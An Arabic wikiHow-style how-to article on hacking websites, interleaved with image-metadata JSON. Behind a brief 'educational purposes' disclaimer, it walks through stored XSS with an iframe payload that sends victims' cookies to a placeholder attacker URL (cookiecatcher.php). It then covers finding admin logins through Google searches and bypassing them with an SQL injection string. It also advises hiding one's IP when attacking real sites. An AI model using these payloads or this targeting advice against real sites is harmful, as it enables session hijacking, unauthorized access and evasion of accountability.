كيفية اختراق المواقع

ملاحظة : هذه 'المقالة' هي لأغراض تعليمية فقط أو لمساعدة الأشخاص في بدء تعلم الاختراق الأبيض (أمن المعلومات) أو حتى لأصحاب المواقع الراغبين في التعرف على أساليب المخترقين وحماية مواقعهم وتحسينها ضدهم. ستزودك هذه المقالة التعليمية بالخطوات اللازمة للوصول إلى العديد من المواقع منخفضة الحماية.

طريقة 1

طريقة 1 من 3:

باستخدام الثغرة البرمجية Cross-site scripting (XSS)

تنزيل المقال

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

مواقع تبادل الآراء بالمنشورات هي أفضل مثال. تذكر أنه لو كان هذا الموقع محميّ جيّدًا، فلن تعمل هذه الطريقة.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

2
اذهب إلى خيار إنشاء منشور جديد. ستحتاج لكتابة بعض الأكواد الخاصة (الشيفرات البرمجية) في منشورك هذا، مما سيسمح لك بالحصول على معلومات كل شخص يضغط عليه.
- يجب أن تختبر فيما إذا كان الموقع يقوم بتصفية المنشورات المحتوية على أكواد برمجية. اكتب
```
<script>window.alert(“test”)</script>
```
  في حال ظهرت لك رسالة تحذيرية عندما تضغط على نشر، فالموقع يمكن اختراقه بهذه الطريقة.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

الهدف من إجراء هذا الهجوم هو الحصول على الكوكيز الخاصة بالمستخدم (أي سجل نشاطاته على الانترنت) مما يخولك بالوصول إلى حسابه الخاص بالموقع الذي يعاني من ثغرات تسجيل الدخول. ستحتاج إلى برنامج الحصول على الكوكيز، الذي سيقوم بجلب الكوكيز الخاصة بالضحية ثم تغيير وجهتها لتصل إليك. قم برفع البرنامج إلى موقع لديك صلاحيات بالدخول إليه ويدعم php.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

4
انشر الكود المساعد في الحصول على الكوكيز. اكتب الكود المناسب في المنشور والذي سيقوم بدوره بجمع الكوكيز وإرسالهم إلى موقعك. ستودّ أن تضيف بعضًا من النّص بعد الكود من أجل أن تبعد الغموض عنك وتحفظ منشورك من أن يتم حذفه.
- مثال على الكود
  <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

بعد ذلك، يمكنك استخدام معلومات الكوكيز، والتي يجب أن يتم حفظها في موقعك، لأي غرض تريده.

طريقة 2

طريقة 2 من 3:

تنفيذ الهجوم اعتمادًا على ثغرات الحقن

تنزيل المقال

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

يجب أن تجد موقع يمكنك اختراقه اعتمادًا على الثغرات الموجودة فيه، بسبب وجود ميزة تسجيل الدخول كمدير يجعل الوصول لصلاحياته أمرًا سهلًا. ابحث في غوغل عن العبارة التالية admin login.asp.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

اكتب admin في حقل اسم المستخدم، أما كلمة المرور فاجعلها مكوّنة من رقم واحد وكرره داخل سلسلة محرفية اختياريّة. المثال الشائع على ذلك هو 1’ أو ’1’='1.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

من الممكن أن يتطلب الأمر القليل من التجريب والخطأ.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

أخيرًا، يحب عليك أن تكون قادرًا على إيجاد السلسلة المحرفية التي تسمح لك بالدخول إلى الموقع بصلاحيات المدير، باعتبار أن الموقع يتمتع بثغرات من أجل اختراقه.

طريقة 3

طريقة 3 من 3:

أسّس للنجاح

تنزيل المقال

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

في حال أردت أن تتعلم اختراق المواقع بالطريقة الصحيحة، يجب عليك عندها أن تفهم كيف تعمل أجهزة الكومبيوتر وغيرها من التقنيّات. تعلم استخدام لغات برمجة مثل SQL أو بايثون لتتمكن من الحصول على تحكم أفضل بالمواقع التي تستهدفها بالإضافة لمعرفة الثغرات بالأنظمة.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

ستحتاج أن تفهم جيّدًا HTML وJavaScript في حال رغبت في اختراق المواقع بشكل خاص. من الممكن أن يأخذ ذلك الكثير من وقتك لتتعلمه، إلا أنه يوجد الكثير من الطرق المجّانية لتتعلم على الإنترنت، لذا لديك الفرصة إذا كنت تريد حقًّا استغلالها.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

هؤلاء مخترقون يستخدمون معرفتهم من أجل الخير، كاشفين عن ثغرات الحماية وجاعلين الانترنت مكان أفضل لجميع الناس. في حال كنت تريد أن تتعلم الاختراق من أجل القيام بأهداف نبيلة أو من أجل حماية موقعك الخاص، يجب إذًا عليك أن تتواصل مع مواقع الأمن المعلوماتي الموجودة حاليًا على شبكة الانترنت من أجل الحصول على نصائح.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

إذا كنت تريد أن تتعلم كيفية الاختراق أو تريد فقط حماية نفسك، عليك القيام بالكثير من البحث. يوجد الكثير من الطرق التي يمكن أن تجعل المواقع عرضة للاختراق، وهذه القائمة بتغيير مستمر، لذا عليك أن تتعلم باستمرار.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

بما أن قائمة الاختراقات المحتملة هي في تغير مستمر، عليك أن تتأكد من أنك متابع لكل المستجدات أول بأوّل. لأنك محميّ من نوع معيّن من الهجمات هذا لا يعني أنك ستكون بأمان في المستقبل

أفكار مفيدة

اذهب إلى منتديات المخترقين لتحصل على العديد من النصائح المفيدة.

تحذيرات

لن تصبح مخترقًا فور الانتهاء من قراءة هذه المقالة. يجب عليك أن تكتشف مهاراتك وتتدرب ثم تتدرب ثم تتدرب.
إذا كنت تريد أن تجرب الاختراق في العالم الحقيقي، قم بإخفاء عنوان IP الخاص بك باستخدام برامج متوفرة على الانترنت.

تسجيل الدخول

كيفية اختراق المواقع

الخطوات

باستخدام الثغرة البرمجية Cross-site scripting (XSS)

تنفيذ الهجوم اعتمادًا على ثغرات الحقن

أسّس للنجاح

أفكار مفيدة

تحذيرات

مقالات ذات صلة في ويكي هاو

المزيد حول هذا المقال

هل ساعدك هذا المقال؟

مقالات ويكي هاو ذات صلة

تابعنا

مشاركة

Explore Categories